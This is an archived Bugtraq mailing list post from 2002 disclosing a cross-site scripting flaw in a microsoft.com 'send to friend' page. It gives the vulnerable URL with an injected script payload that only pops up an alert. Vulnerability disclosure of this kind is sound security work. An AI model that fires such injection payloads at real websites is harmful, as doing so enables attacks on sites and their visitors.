[23724] in bugtraq

home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Cross Site Scripting in microsoft.com

daemon@ATHENA.MIT.EDU (frog frog)
Mon Jan 7 03:53:23 2002

Date: 6 Jan 2002 16:28:54 -0000
Message-ID: <20020106162854.5339.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: frog frog <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com



The hole is here :

http://www.microsoft.com/freedomtoinnovate/inc/send
friend.asp?sAddress="><script>alert('Microsoft%
20hole')</script>

frog

home	help	back	first	fref	pref	prev	next	nref	lref	last	post